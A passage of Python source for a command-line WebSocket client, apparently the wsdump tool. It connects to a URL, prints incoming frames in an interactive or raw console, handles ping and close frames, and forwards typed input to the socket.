            line = line.decode(ENCODING).encode("utf-8")
        elif isinstance(line, six.text_type):
            line = line.encode("utf-8")
        return line
class InteractiveConsole(RawInput, code.InteractiveConsole):
    """Console that redraws the '> ' prompt around incoming messages."""

    def write(self, data):
        # Erase the current line and move to its start (ANSI escapes).
        sys.stdout.write("\033[2K\033[E")
        # sys.stdout.write("\n")
        # Incoming message in blue, then restore the default foreground color.
        sys.stdout.write("\033[34m< " + data + "\033[39m")
        sys.stdout.write("\n> ")
        sys.stdout.flush()

    def read(self):
        return self.raw_input("> ")
class NonInteractive(RawInput):
    """Plain pass-through console used in --raw mode (no prompt, no colors)."""

    def write(self, data):
        # Emit the payload verbatim, newline-terminated, flushed immediately.
        out = sys.stdout
        out.write(data)
        out.write("\n")
        out.flush()

    def read(self):
        # No prompt in raw mode.
        return self.raw_input("")
def main():
    """Connect to the websocket, echo incoming frames on a background thread,
    and forward console input until Ctrl+C or EOF."""
    start_time = time.time()
    args = parse_args()
    if args.verbose > 1:
        websocket.enableTrace(True)
    options = {}
    if args.proxy:
        p = urlparse(args.proxy)
        options["http_proxy_host"] = p.hostname
        options["http_proxy_port"] = p.port
    if args.origin:
        options["origin"] = args.origin
    if args.subprotocols:
        options["subprotocols"] = args.subprotocols
    opts = {}
    if args.nocert:
        # Disable certificate and hostname verification entirely.
        opts = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False}
    if args.headers:
        options['header'] = map(str.strip, args.headers.split(','))
    ws = websocket.create_connection(args.url, sslopt=opts, **options)
    if args.raw:
        console = NonInteractive()
    else:
        console = InteractiveConsole()
        print("Press Ctrl+C to quit")

    def recv():
        """Receive one frame; answer CLOSE/PING control frames inline.

        Returns (opcode, data); data is None for close/error."""
        try:
            frame = ws.recv_frame()
        except websocket.WebSocketException:
            # Treat any receive failure as a close.
            return websocket.ABNF.OPCODE_CLOSE, None
        if not frame:
            raise websocket.WebSocketException("Not a valid frame %s" % frame)
        elif frame.opcode in OPCODE_DATA:
            return frame.opcode, frame.data
        elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
            ws.send_close()
            return frame.opcode, None
        elif frame.opcode == websocket.ABNF.OPCODE_PING:
            ws.pong(frame.data)
            return frame.opcode, frame.data
        return frame.opcode, frame.data

    def recv_ws():
        """Background loop: print received messages until the peer closes."""
        while True:
            opcode, data = recv()
            msg = None
            if six.PY3 and opcode == websocket.ABNF.OPCODE_TEXT and isinstance(data, bytes):
                data = str(data, "utf-8")
            if not args.verbose and opcode in OPCODE_DATA:
                msg = data
            elif args.verbose:
                # Verbose mode prefixes the opcode name.
                msg = "%s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)
            if msg is not None:
                if args.timings:
                    console.write(str(time.time() - start_time) + ": " + msg)
                else:
                    console.write(msg)
            if opcode == websocket.ABNF.OPCODE_CLOSE:
                break

    thread = threading.Thread(target=recv_ws)
    thread.daemon = True
    thread.start()
    if args.text:
        ws.send(args.text)
    # Foreground loop: read from the console and forward to the socket.
    while True:
        try:
            message = console.read()
            ws.send(message)
        except KeyboardInterrupt:
            return
        except EOFError:
            # Give in-flight replies a chance to arrive before exiting.
            time.sleep(args.eof_wait)
            return
if __name__ == "__main__":
    try:
        main()
    except Exception as e:
        # Top-level boundary: show a short message instead of a traceback.
        # KeyboardInterrupt is not an Exception subclass and still propagates.
        print(e)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.